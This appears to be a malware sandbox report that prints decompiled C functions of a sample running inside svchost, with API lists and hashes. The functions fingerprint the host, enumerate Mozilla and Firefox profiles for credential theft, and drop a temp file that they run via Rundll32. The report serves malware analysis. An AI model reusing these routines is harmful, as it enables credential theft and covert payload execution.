• Opcode Fuzzy Hash: 79b9f4464c1a45c66f256ac5816d973324aa2588fd6b094609e80367919249ee
• Instruction Fuzzy Hash: 8531C079D0454ABAEF02DFA0CC06FEE7A75FF143C0F104021F614650A6DB7A9A60AB65
Uniqueness
Uniqueness Score: 16.53%

                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E100027D0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                        				char _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				void* _v16;
                                                                                                                                        				char _v277;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __ebp;
                                                                                                                                        				void* _t23;
                                                                                                                                        				void* _t24;
                                                                                                                                        				long _t27;
                                                                                                                                        				void* _t35;
                                                                                                                                        				void* _t36;
                                                                                                                                        				void** _t41;
                                                                                                                                        				void* _t43;
                                                                                                                                        				void* _t45;
                                                                                                                                        				void* _t51;
                                                                                                                                        				void* _t52;
                                                                                                                                        				void* _t53;
                                                                                                                                        
                                                                                                                                        				_t53 = __edx;
                                                                                                                                        				_t52 = __ecx;
                                                                                                                                        				_t23 = E10001D2A( *0x1000f159, "Software\\WinRAR", _a4, _a8); // executed
                                                                                                                                        				_t24 = _t23;
                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                        					return _t24;
                                                                                                                                        				}
                                                                                                                                        				_t51 = 0;
                                                                                                                                        				_t27 = GetTempPathA(0x104,  &_v277);
                                                                                                                                        				if(_t27 == 0 || _t27 > 0x104) {
                                                                                                                                        					L12:
                                                                                                                                        					return _t51;
                                                                                                                                        				} else {
                                                                                                                                        					E10001000( &_v8, _t52, _t53,  &_v8);
                                                                                                                                        					if(E10002582( &_v277) != 0) {
                                                                                                                                        						_t35 = E10001DB1( &_v277, _a4);
                                                                                                                                        					} else {
                                                                                                                                        						_t35 = E10001E05(E10001DB1( &_v277, "\\"), _a4);
                                                                                                                                        					}
                                                                                                                                        					_push(_t35);
                                                                                                                                        					_t36 = E10001230(_t35, _t53, _t35, _v8); // executed
                                                                                                                                        					_t37 = _t36;
                                                                                                                                        					if(_t36 != 0) {
                                                                                                                                        						_v12 = E10001091(_t37, _t51, _t53, _v8);
                                                                                                                                        						if(_v12 != 0) {
                                                                                                                                        							_t41 =  &_v16;
                                                                                                                                        							_push(_t41);
                                                                                                                                        							_push(_v8);
                                                                                                                                        							L1000BA64();
                                                                                                                                        							if(_t41 >= 0) {
                                                                                                                                        								_t43 = GlobalLock(_v16);
                                                                                                                                        								if(_t43 != 0) {
                                                                                                                                        									_t51 = E10001888(_v12);
                                                                                                                                        									_t45 = _t43;
                                                                                                                                        									E100018BF(_t45, _t51, _v12);
                                                                                                                                        									GlobalUnlock(_v16);
                                                                                                                                        									_push(_v12);
                                                                                                                                        									_pop( *__eax);
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					E10001026(E10001871(), _t51, _t52, _t53, _v8);
                                                                                                                                        					goto L12;
                                                                                                                                        				}
                                                                                                                                        			}


                                                                                                                                        APIs
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 10002806
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 10002888
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10002894
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,00000104,?), ref: 100028B6
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(?), ref: 10001E26
                                                                                                                                          • Part of subcall function 10001E05: lstrlenA.KERNEL32(00000000,?), ref: 10001E30
                                                                                                                                          • Part of subcall function 10001E05: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
                                                                                                                                          • Part of subcall function 10001E05: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                                                                                                                                        • String ID: Software\WinRAR
                                                                                                                                        • API String ID: 2536169780-224198155
                                                                                                                                        • Opcode ID: 3da94f2e42828e5cfac39993ff84f161047426bdbaa571987ef003aa2186e0cf
                                                                                                                                        • Instruction ID: 46b00ebf58113241f6c1fab732dd0f6279f58fa6253cb30bb0caeb6f346b3a42
                                                                                                                                        • Opcode Fuzzy Hash: 3da94f2e42828e5cfac39993ff84f161047426bdbaa571987ef003aa2186e0cf
                                                                                                                                        • Instruction Fuzzy Hash: F521DC7A900509BAFF01DBE0DC96DDDBBB9EF042C4F5084A1B610E106ADB75AB549B20
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.13%

                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                        			E10004462(void* __ecx, void* __edx) {
                                                                                                                                        				signed char _v5;
                                                                                                                                        				signed char _v6;
                                                                                                                                        				signed char _v7;
                                                                                                                                        				signed char _v8;
                                                                                                                                        				signed char _v9;
                                                                                                                                        				signed char _v10;
                                                                                                                                        				signed char _v11;
                                                                                                                                        				signed char _v12;
                                                                                                                                        				signed short _v14;
                                                                                                                                        				signed short _v16;
                                                                                                                                        				char _v20;
                                                                                                                                        				char _v120;
                                                                                                                                        				char _v124;
                                                                                                                                        				void* _t19;
                                                                                                                                        				char* _t21;
                                                                                                                                        
                                                                                                                                        				_t19 = E100027D0(__ecx, __edx, "HWID",  &_v124); // executed
                                                                                                                                        				_push(_t19);
                                                                                                                                        				if(_t19 == 0 || _v124 <= 0x14) {
                                                                                                                                        					_t21 =  &_v20;
                                                                                                                                        					_push(_t21);
                                                                                                                                        					L1000BA6A();
                                                                                                                                        					if(_t21 >= 0) {
                                                                                                                                        						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
                                                                                                                                        						E100026B6("HWID",  &_v120, lstrlenA( &_v120)); // executed
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return E10001871();
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100027D0: GetTempPathA.KERNEL32(00000104,?), ref: 10002806
                                                                                                                                          • Part of subcall function 100027D0: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 10002888
                                                                                                                                          • Part of subcall function 100027D0: GlobalLock.KERNEL32 ref: 10002894
                                                                                                                                          • Part of subcall function 100027D0: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,00000104,?), ref: 100028B6
                                                                                                                                        • CoCreateGuid.OLE32(?,00000000), ref: 10004485
                                                                                                                                        • wsprintfA.USER32 ref: 100044CC
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100044D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                                                                                                                        • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                                                                                        • API String ID: 1852535927-1100116640
                                                                                                                                        • Opcode ID: a3aebacc5fe886e5daaf2d12baefe3988e323301630a4f1443627dca083b1fae
                                                                                                                                        • Instruction ID: f13a7a93b88228d76f90baa43efec095f4afbf0aa1e0b104d60f8e9bc83cedd9
                                                                                                                                        • Opcode Fuzzy Hash: a3aebacc5fe886e5daaf2d12baefe3988e323301630a4f1443627dca083b1fae
                                                                                                                                        • Instruction Fuzzy Hash: 6A1121AAC045997DAB61C7E68C41EFEBBFCDE0D181F140096B690E1486D63DD700EB35
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443360(CHAR* _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				long _v12;
                                                                                                                                        				char _v272;
                                                                                                                                        				char _v532;
                                                                                                                                        				int _t17;
                                                                                                                                        				intOrPtr _t19;
                                                                                                                                        
                                                                                                                                        				 *_a4 = 0;
                                                                                                                                        				_v12 = 0x104;
                                                                                                                                        				_t17 = GetComputerNameA( &_v272,  &_v12);
                                                                                                                                        				_t34 = _t17 - 1;
                                                                                                                                        				if(_t17 == 1) {
                                                                                                                                        					lstrcatA(_a4,  &_v272);
                                                                                                                                        				}
                                                                                                                                        				lstrcatA(_a4, " @ ");
                                                                                                                                        				_v8 = 0;
                                                                                                                                        				_t19 = E02443050(_t34,  &_v532); // executed
                                                                                                                                        				_v8 = _t19;
                                                                                                                                        				if(_v8 == 1) {
                                                                                                                                        					lstrcatA(_a4,  &_v532);
                                                                                                                                        				}
                                                                                                                                        				return 1;
                                                                                                                                        			}

                                                                                                                                        0x02443374
                                                                                                                                        0x02443378
                                                                                                                                        0x0244338a
                                                                                                                                        0x02443390
                                                                                                                                        0x02443393
                                                                                                                                        0x024433a0
                                                                                                                                        0x024433a0
                                                                                                                                        0x024433af
                                                                                                                                        0x024433b5
                                                                                                                                        0x024433c3
                                                                                                                                        0x024433cb
                                                                                                                                        0x024433d2
                                                                                                                                        0x024433df
                                                                                                                                        0x024433df
                                                                                                                                        0x024433ed

                                                                                                                                        APIs
                                                                                                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0244338A
                                                                                                                                        • lstrcatA.KERNEL32(00000104,?), ref: 024433A0
                                                                                                                                        • lstrcatA.KERNEL32(00000104, @ ), ref: 024433AF
                                                                                                                                        • lstrcatA.KERNEL32(00000104,?), ref: 024433DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcat$ComputerName
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2583549208-203157567
                                                                                                                                        • Opcode ID: 9dfd1d94941f88fba2d985cd71fd435ddd5efe2c7ed03efc9f560a2c74d3726b
                                                                                                                                        • Instruction ID: af1aec7092e6b998ed8170512b4a81c4b5fcc7e27c4c5e611493dfa7630df07e
                                                                                                                                        • Opcode Fuzzy Hash: 9dfd1d94941f88fba2d985cd71fd435ddd5efe2c7ed03efc9f560a2c74d3726b
                                                                                                                                        • Instruction Fuzzy Hash: 6C0184B990020CABEB14DFE4D989BDE7BB9EB44300F104999E60587240DBB5EB94CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.67%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100078D5(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				char _v269;
                                                                                                                                        				void* _t18;
                                                                                                                                        				void* _t19;
                                                                                                                                        				void* _t20;
                                                                                                                                        
                                                                                                                                        				_t20 = __eflags;
                                                                                                                                        				_t19 = __edx;
                                                                                                                                        				_t18 = __ecx;
                                                                                                                                        				_v8 = E100015A9(_a4, 0x28, 0);
                                                                                                                                        				 *0x10010155 = 0;
                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                                                                                        				E10007690(_t18, _a4,  *0x1000f159, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
                                                                                                                                        				E10007690(_t18, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
                                                                                                                                        				SetCurrentDirectoryA( &_v269);
                                                                                                                                        				return E100015EF(__ebx, _t18, _t19, _t20, _a4, _v8);
                                                                                                                                        			}

                                                                                                                                        0x100078d5
                                                                                                                                        0x100078d5
                                                                                                                                        0x100078d5
                                                                                                                                        0x100078ea
                                                                                                                                        0x100078ed
                                                                                                                                        0x10007903
                                                                                                                                        0x10007920
                                                                                                                                        0x1000793c
                                                                                                                                        0x10007948
                                                                                                                                        0x10007959

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10007903
                                                                                                                                          • Part of subcall function 10007690: StrStrIA.SHLWAPI(?,?), ref: 1000769C
                                                                                                                                          • Part of subcall function 10007690: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
                                                                                                                                          • Part of subcall function 10007690: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
                                                                                                                                          • Part of subcall function 10007690: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 10007948
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                                                                                        • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                                                                                                        • API String ID: 3062143572-2716603926
                                                                                                                                        • Opcode ID: c057c88f2d520d1c576ca8cc4073e0ce17c0505d5f2f6d5b8c8518f044ecd356
                                                                                                                                        • Instruction ID: 5c5a7032acf471a97e8589268f1e058c246f32595776fcaf8fb448fa49966ad2
                                                                                                                                        • Opcode Fuzzy Hash: c057c88f2d520d1c576ca8cc4073e0ce17c0505d5f2f6d5b8c8518f044ecd356
                                                                                                                                        • Instruction Fuzzy Hash: F0F06D35A00508FAEF00EFA0CC4AFC87A68EB14380F404010F7487C166DBB5EA90DA41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10007798(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				char _v269;
                                                                                                                                        				void* _t18;
                                                                                                                                        				void* _t19;
                                                                                                                                        				void* _t20;
                                                                                                                                        
                                                                                                                                        				_t20 = __eflags;
                                                                                                                                        				_t19 = __edx;
                                                                                                                                        				_t18 = __ecx;
                                                                                                                                        				_v8 = E100015A9(_a4, 0x24, 0);
                                                                                                                                        				 *0x10010155 = 0;
                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                                                                                        				E10007690(_t18, _a4,  *0x1000f159, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                                                                                        				E10007690(_t18, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                                                                                        				SetCurrentDirectoryA( &_v269);
                                                                                                                                        				return E100015EF(__ebx, _t18, _t19, _t20, _a4, _v8);
                                                                                                                                        			}

                                                                                                                                        0x10007798
                                                                                                                                        0x10007798
                                                                                                                                        0x10007798
                                                                                                                                        0x100077ad
                                                                                                                                        0x100077b0
                                                                                                                                        0x100077c6
                                                                                                                                        0x100077e3
                                                                                                                                        0x100077ff
                                                                                                                                        0x1000780b
                                                                                                                                        0x1000781c

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 100077C6
                                                                                                                                          • Part of subcall function 10007690: StrStrIA.SHLWAPI(?,?), ref: 1000769C
                                                                                                                                          • Part of subcall function 10007690: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
                                                                                                                                          • Part of subcall function 10007690: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
                                                                                                                                          • Part of subcall function 10007690: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 1000780B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                                                                                                        • API String ID: 3062143572-2631691096
                                                                                                                                        • Opcode ID: 69380712fedf0d909aead7f667b2d3bf459bb761e2c57761879b42df2d2827bc
                                                                                                                                        • Instruction ID: 3ab3e9d299f7e720ac3b5f374585deef011e195cefbe90e33e1ea0ca3ee9814c
                                                                                                                                        • Opcode Fuzzy Hash: 69380712fedf0d909aead7f667b2d3bf459bb761e2c57761879b42df2d2827bc
                                                                                                                                        • Instruction Fuzzy Hash: 99F03A34A40508FEEB10DF94CC8AFCD3A69EB58384F404050F788BD1A7DBF5EA909A55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 88%
E1000178E(void* __ecx, void* __edx, intOrPtr _a4) {
	void* _v8;
	intOrPtr _v12;
	intOrPtr _v16;
	intOrPtr _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	void* __ebx;
	void* __ebp;
	void* _t27;
	signed int _t41;
	signed int _t42;
	signed int _t45;
	void* _t49; // used below but left undeclared by the decompiler

	_t49 = __edx;
	_t45 = 0;
	_t27 = &_v8;
	_push(_t27);
	_push(_a4);
	L1000BA64(); // GetHGlobalFromStream (ref 1000179E in the APIs list): HGLOBAL for the stream in _a4 lands in _v8
	if(_t27 >= 0) {
		_v16 = E10001091(_t27, 0, __edx, _a4);
		_t27 = GlobalLock(_v8);
		if(_t27 != 0) {
			_v20 = _t27;
			_v24 = E10001888(E1000D122() + 0x500000); // E10001888 wraps LocalAlloc (see APIs)
			_v28 = E10001888(E1000D128(_v16) + 0x100000);
			_v12 = E1000D136(_v20, _v28, _v16, _v24, 0, _v16);
			E10001356(GlobalUnlock(_v8), _t49, _a4);
			_t41 = E10001537(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8); // marker string, also listed under Strings
			_t42 = E10001522(_a4, _v16);
			_t45 = _t41 & _t42 & E10001558(_a4, _v28, _v12);
			E10001871(_v24); // executed; E10001871 wraps LocalFree (see APIs)
			_t27 = E10001871(_v28); // executed
		}
	}
	E100012C2(_t27, _t49, _a4);
	return _t45;
}


APIs
• GetHGlobalFromStream.OLE32(?,?), ref: 1000179E
• GlobalLock.KERNEL32 ref: 100017B9
  • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
• GlobalUnlock.KERNEL32(?,?,?,?,?,-00100000,-00500000), ref: 10001817
  • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
Strings
• PKDFILE0YUICRYPTED0YUI1.0, xrefs: 10001826
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: Global$Local$AllocFreeFromLockStreamUnlock
• String ID: PKDFILE0YUICRYPTED0YUI1.0
• API String ID: 1329788818-258907703
• Opcode ID: d2e2b1e2c0e86b9c7621bf4f1e43991d9492bae71a4490d4755ae812cd725422
• Instruction ID: 014b971cb4d958fd93ff8857645bedbef4dad2c89e54b6919e2ad1157fae85fe
• Opcode Fuzzy Hash: d2e2b1e2c0e86b9c7621bf4f1e43991d9492bae71a4490d4755ae812cd725422
• Instruction Fuzzy Hash: 2E21DEBAD00509BFEF019FA0CC42AED7E76EF14380F508071BA1065165EB72AB61AB91
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 100%
E02443050(void* __eflags, CHAR* _a4) {
	long _v8;
	intOrPtr _v12;
	long _v16;
	long _v20;
	char _v280;
	char _v540;
	long _t21;
	intOrPtr _t24;

	_v20 = 0x104; // MAX_PATH-sized buffers
	_v16 = 0x104;
	*_a4 = 0;
	_t21 = E02443100("explorer.exe"); // executed; E02443100 walks EnumProcesses (see APIs)
	_v8 = _t21;
	if(_v8 != 0xffffffff) {
		_v12 = 0;
		_t24 = E02443270(_v8, &_v540, _v20, &_v280, _v16); // executed
		_v12 = _t24;
		if(_v12 != 1) {
			return 0;
		}
		lstrcpyA(_a4, &_v280); // _a4 = _v280 + "\" + _v540
		lstrcatA(_a4, "\\");
		lstrcatA(_a4, &_v540);
		return 1;
	}
	return 0;
}


APIs
  • Part of subcall function 02443100: EnumProcesses.PSAPI(?,00001000,?,?,02443080,explorer.exe), ref: 0244311D
• lstrcpyA.KERNEL32(00000001,?), ref: 024430CD
• lstrcatA.KERNEL32(00000001,02444298), ref: 024430DC
• lstrcatA.KERNEL32(00000001,?), ref: 024430ED
Strings
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrcat$EnumProcesseslstrcpy
• String ID: explorer.exe
• API String ID: 424215357-3187896405
• Opcode ID: 276635520a2788aaeaf6f6c0f1c145be33982896dca7376ab7978f74c890e473
• Instruction ID: 0a654217cd356744d70fde18975de9e6ed44fb7aa35a24ed8a9cff3a78ea5026
• Opcode Fuzzy Hash: 276635520a2788aaeaf6f6c0f1c145be33982896dca7376ab7978f74c890e473
• Instruction Fuzzy Hash: 651154B5D00208EBEF14DFE8D949BDE7BB8AB09700F108699E60597240DB74A685CF91
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 88%
E02443C80(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
	char _v264;
	char _v524;
	char _v784;
	void* _t17;
	void* _t21;

	GetTempPathA(0x104, &_v524);
	GetTempFileNameA(&_v524, "BN", 0, &_v264); // executed; temp file name with prefix "BN"
	_t17 = E02443C10(_a4, &_v264, _a4, _a8); // executed; E02443C10 does CreateFileA/WriteFile/CloseHandle (see APIs)
	if(_t17 != 1) {
		return 0;
	}
	_push(_a8);
	if(E02443650(_a4) != 1) {
		_t21 = E02443940(&_v264); // executed; E02443940 wraps CreateProcessA (see APIs)
		return _t21;
	}
	wsprintfA(&_v784, "Rundll32.exe %s,f1", &_v264); // same launch, but through Rundll32 with export f1
	return E02443940(&_v784);
}


APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 02443C95
• GetTempFileNameA.KERNEL32(?,024442A0,00000000,?), ref: 02443CB0
  • Part of subcall function 02443C10: CreateFileA.KERNEL32(02442789,40000000,00000000,00000000,00000002,00000080,00000000,02442789), ref: 02443C36
  • Part of subcall function 02443C10: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02443C57
  • Part of subcall function 02443C10: CloseHandle.KERNEL32(000000FF), ref: 02443C61
• wsprintfA.USER32 ref: 02443CFA
  • Part of subcall function 02443940: CreateProcessA.KERNEL32 ref: 02443977
Strings
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
• String ID: Rundll32.exe %s,f1
• API String ID: 130250823-1406688557
• Opcode ID: 8fbdaed9970282f109c286b7914d494174aa1fdfa446688a63999217d70109f7
• Instruction ID: df70c322c07928053996e5bcfdeb59ed976458aa9e0d36252f513a4807012baa
• Opcode Fuzzy Hash: 8fbdaed9970282f109c286b7914d494174aa1fdfa446688a63999217d70109f7
• Instruction Fuzzy Hash: 001169FA8002186BFB24DF50EC85FEA777DAB54B00F1045D5FA0996141EA71AB988F91
Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 90%
/* Reads one registry value and returns a freshly allocated copy of its data
   (0 on failure). _a4 is the root key, _a8 the subkey path, _a12 the value
   name, _a16 an optional out-pointer that receives the data size. The fifth
   argument selects the registry view: 1 -> KEY_WOW64_32KEY (0x200),
   2 -> KEY_WOW64_64KEY (0x100), anything else -> the caller's native view.
   0x20019 is KEY_READ. If the chosen view yields nothing the function calls
   itself with view + 1, so a caller that starts at 0 tries the native view,
   then the 32-bit and finally the 64-bit redirected hive. E10001888/E10001871
   are the sample's allocator and free routines (not shown on this page). */
E10001C46(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
	void* _v8;
	int _v12;
	int _v16;
	int** _t28;
	long _t30;
	char* _t33;
	void* _t36;
	long _t39;
	long _t46;
	signed int _t51;
	char* _t53;

	_t28 = _a16;
	if(_t28 != 0) {
		 *_t28 = 0;                                   // size out-parameter defaults to 0
	}
	_t53 = 0;
	if(_a20 != 1) {
		if(_a20 != 2) {
			_t51 = 0;                                 // native view
		} else {
			_t51 = 0x100;                             // KEY_WOW64_64KEY
		}
	} else {
		_t51 = 0x200;                                 // KEY_WOW64_32KEY
	}
	_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed; 0x20019 == KEY_READ
	if(_t30 == 0) {
		// first query: _v16 receives the value type, _v12 the data size
		_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
		// reject empty data and a one-byte REG_SZ (type 1), i.e. an empty string
		if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
			_t53 = E10001888(_v12 + 1);               // size + 1 leaves room for a terminator
			_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed; second query fetches the data
			if(_t46 == 0) {
				if(_a16 != 0) {
					 *_a16 = _v12;                    // decompiler emitted this as push/pop through eax; eax holds _a16 here
				}
			} else {
				E10001871(_t53);                      // free the buffer on failure
				_t53 = 0;
			}
		}
		RegCloseKey(_v8); // executed
	}
	_t33 = _t53;
	if(_t33 != 0 || _a20 >= 2) {
		return _t33;                                  // found, or all three views exhausted
	} else {
		_t36 = E10001C46(_a4, _a8, _a12, _a16, _a20 + 1); // executed; retry in the next registry view
		return _t36;
	}
}














Instruction addresses for the E10001C46 listing, one per decompiled statement in the report's side-by-side view: 0x10001c50 through 0x10001d27.

APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 10001C8B
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 10001CA6
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 10001CDC
• RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 10001CFE
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: QueryValue$CloseOpen
• String ID:
• API String ID: 1586453840-0
• Opcode ID: 0f25478ef340ae590cc18262efe93c4c9f14ad30b0b6321c26add42bfb7f1cf4
• Instruction ID: 20b426dc677a55785aa396109236163a75eac4ea1cea175ba46e60eb4feeac1b
• Opcode Fuzzy Hash: 0f25478ef340ae590cc18262efe93c4c9f14ad30b0b6321c26add42bfb7f1cf4
• Instruction Fuzzy Hash: C8213972A4050AEEFF11CE94CD46FEE7ABAEB453C0F104025F91096098D731DE51DB51
Uniqueness
Uniqueness Score: 0.05%
C-Code - Quality: 90%
